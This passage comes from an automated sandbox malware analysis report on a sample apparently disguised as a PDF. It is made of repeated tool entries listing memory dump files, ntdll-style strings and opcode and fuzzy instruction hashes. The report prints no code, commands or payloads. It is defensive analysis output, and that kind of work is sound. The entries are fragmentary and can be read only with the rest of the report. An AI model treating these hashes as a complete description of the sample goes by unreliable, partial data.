                                                                                                                                                • API ID:
                                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                • API String ID: 0-118005554
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: a2$ a2
                                                                                                                                                • API String ID: 0-402434715
                                                                                                                                                Strings
                                                                                                                                                • RtlpInitializeAssemblyStorageMap, xrefs: 3269289A
                                                                                                                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3269289F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                • API String ID: 0-2653619699
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: MUI
                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID: DebugPrintTimes
                                                                                                                                                 • String ID:
                                                                                                                                                 • API String ID: 3446177414-0
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID: DebugPrintTimes
                                                                                                                                                 • String ID:
                                                                                                                                                 • API String ID: 3446177414-0
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID: DebugPrintTimes
                                                                                                                                                 • String ID:
                                                                                                                                                 • API String ID: 3446177414-0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID:
                                                                                                                                                 • String ID: #%u
                                                                                                                                                 • API String ID: 0-232158463
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID:
                                                                                                                                                 • String ID: @
                                                                                                                                                 • API String ID: 0-2766056989
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID:
                                                                                                                                                 • String ID: EXT-
                                                                                                                                                 • API String ID: 0-1948896318
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID:
                                                                                                                                                 • String ID: @
                                                                                                                                                 • API String ID: 0-2766056989
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID:
                                                                                                                                                 • String ID: a2
                                                                                                                                                 • API String ID: 0-541903986
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID:
                                                                                                                                                 • String ID: #
                                                                                                                                                 • API String ID: 0-1885708031
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                                                 • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                 Similarity
                                                                                                                                                 • API ID:
                                                                                                                                                 • String ID: Flst
                                                                                                                                                 • API String ID: 0-2374792617
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: d2
                                                                                                                                                • API String ID: 0-2767080420
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2210f4cdb87327745e67d47433e4cc29f3b94c1800d9025ca39baf076f1de6f7
                                                                                                                                                • Instruction ID: 960765c80f07704a2b1ac1c173fc81d2ae8de39aea57042c480fb46c691177bc
                                                                                                                                                • Opcode Fuzzy Hash: 2210f4cdb87327745e67d47433e4cc29f3b94c1800d9025ca39baf076f1de6f7
                                                                                                                                                • Instruction Fuzzy Hash: 51A1DFB2609701EFDB15CF18C980B5AB7E9FF48708F400928E685EBA60C775EC51CB95
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0c52b0224d78ce955a20c80f29d0430fe3b5e2311971cd0c18d418ad6b3957a3
                                                                                                                                                • Instruction ID: 1b186d4963bd537a351e93bdca8ab30cb854543525de31d96d16409ecfd62788
                                                                                                                                                • Opcode Fuzzy Hash: 0c52b0224d78ce955a20c80f29d0430fe3b5e2311971cd0c18d418ad6b3957a3
                                                                                                                                                • Instruction Fuzzy Hash: 499126B5A02715CBF71A8B64C480BAE77B1FF88758F114469EA00DB3A1DB349D41CBE2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4b5c20fbe2ff2f6336f44fcea9243bd31bd930d984d3711db0830271de1ddee0
                                                                                                                                                • Instruction ID: 94d275ca9455b20e2af80e11a2dd5132d394b2000af0268a0c14d80583480bd6
                                                                                                                                                • Opcode Fuzzy Hash: 4b5c20fbe2ff2f6336f44fcea9243bd31bd930d984d3711db0830271de1ddee0
                                                                                                                                                • Instruction Fuzzy Hash: AEB16DB8A423058FEB18CF28C450B9977F4BF89358F644559DC61AB391DB71D882CF91
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 53f35fcf697090126faaabcb84878b99f5a1d40dff1a98c61c5e938d6328b591
                                                                                                                                                • Instruction ID: 3479eae3402f31de93f4ea250cc8838a4fbbc3bfd1b3546305033410211d1de7
                                                                                                                                                • Opcode Fuzzy Hash: 53f35fcf697090126faaabcb84878b99f5a1d40dff1a98c61c5e938d6328b591
                                                                                                                                                • Instruction Fuzzy Hash: C2A14575608342CFD31ACF28C580A1ABBF5BF88744F24496DE9849B350EB70E985CF96
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                • Instruction ID: 6746095cc1c3e797b6c52903c4a0734312101f548b26e842187dbaac4a5352fc
                                                                                                                                                • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                • Instruction Fuzzy Hash: 1771AD75A0021E9BDB04CF66C891BBEB7F9AF44784F96411EDC00EB248EB34D951DB91
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 379dbb3281b4712c84079eb96ae12bbb251b2d605b996480fc6a910d5aa772c4
                                                                                                                                                • Instruction ID: 03b5af98773d74f98fba9b0f218c76cdc001385302a2ba46de6f8325b42b3190
                                                                                                                                                • Opcode Fuzzy Hash: 379dbb3281b4712c84079eb96ae12bbb251b2d605b996480fc6a910d5aa772c4
                                                                                                                                                • Instruction Fuzzy Hash: 3581AE79A013098FDF09CF98C991AAEB7F6BF84314F158169D8169B344DB74EE02CB90
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3adcadc0fd889e3a013e1b58e5df1d5051ce5dd004f9e2bb82fad6756921cb55
                                                                                                                                                • Instruction ID: 134b9834e9ff29c5b9db3bd841417615729e4b006a75b8981018f80d4167e0d0
                                                                                                                                                • Opcode Fuzzy Hash: 3adcadc0fd889e3a013e1b58e5df1d5051ce5dd004f9e2bb82fad6756921cb55
                                                                                                                                                • Instruction Fuzzy Hash: B5816B75A00709AFEB15CFA4D890BDEB7FAFF88354F204429E556A7210DB70AC45CBA4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d474891a01ebf92505534ed847db8b9c0ecd6cb833efa1bef32b459cb88eacc8
                                                                                                                                                • Instruction ID: 702101d039a734fd126a0d2cc0295ab80ab03c10c3a0af005667cc230d3f79a9
                                                                                                                                                • Opcode Fuzzy Hash: d474891a01ebf92505534ed847db8b9c0ecd6cb833efa1bef32b459cb88eacc8
                                                                                                                                                • Instruction Fuzzy Hash: F861F5B4B032059BDF19CF64CA80BBF77AAAF84358F544519E8A297290DF70DD41CBA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 80695a74354f04dca1e47f7b434a22948857433d4cb376edfa6649ef6c631567
                                                                                                                                                • Instruction ID: 0ac48946c47d59b88e23203763c6440fefd04de77c60bf0be2123e0e0c07967f
                                                                                                                                                • Opcode Fuzzy Hash: 80695a74354f04dca1e47f7b434a22948857433d4cb376edfa6649ef6c631567
                                                                                                                                                • Instruction Fuzzy Hash: 2971C0B9D06729DBDB2ACF58D8907AEBBB0FF8D710F10515AE941A7350DB349841CBA0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9cef3489f3e92c150c63b62af8f58cada81b50b28740eb37958c50e266817bbf
                                                                                                                                                • Instruction ID: 01e4ddd9bb3200360acbcb27bca6f401d1e6e94aa5d5355d716fab380a2b10c8
                                                                                                                                                • Opcode Fuzzy Hash: 9cef3489f3e92c150c63b62af8f58cada81b50b28740eb37958c50e266817bbf
                                                                                                                                                • Instruction Fuzzy Hash: FC712476A052418FD306CF28C490B26B7E5FF88710F1484A9E99ACB362DB74DD45CBA6
                                                                                                                                                Memory Dump Source
• Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
• Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 335e3fc24f8aaead77878d7a40cfa2d74c4098ebce6a007b4e937f8131fb124a
• Instruction ID: f360280ffe272030ab63f5274c721efe2c7c1b386b0822995ca74857b20a28e8
• Opcode Fuzzy Hash: 335e3fc24f8aaead77878d7a40cfa2d74c4098ebce6a007b4e937f8131fb124a
• Instruction Fuzzy Hash: 09512374A08301DFD719CF29C090A2ABBF5BF88744F50496EE999A7354DB70E844CF92
Memory Dump Source
• Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
• Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bf7709e432c8e4be5030b8676b4293a0109642e1060b161bfff3254d11f7be0b
                                                                                                                                                • Instruction ID: 26353ad6d78e10db5469b0ea07953dfbea927d93d838a8fa84b5cad167ab9d84
                                                                                                                                                • Opcode Fuzzy Hash: bf7709e432c8e4be5030b8676b4293a0109642e1060b161bfff3254d11f7be0b
                                                                                                                                                • Instruction Fuzzy Hash: 1541E471640700DFD72A8F2AD880B1B77A9FF44754F11842EEA499B2A0DBB0FC51CB95
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6b161184c2d2745140753994f4871465295bdc91a4e643b80d8d5fa630844f57
                                                                                                                                                • Instruction ID: 9e7bd303deb13a369e4ae1e1c5357f775ffeed3f709131ae07336ee798a6eb70
                                                                                                                                                • Opcode Fuzzy Hash: 6b161184c2d2745140753994f4871465295bdc91a4e643b80d8d5fa630844f57
                                                                                                                                                • Instruction Fuzzy Hash: C451E2B16013419FE325DF64CC80FAA77A8FF847A4F100A2DE95197291DF74E841CBAA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
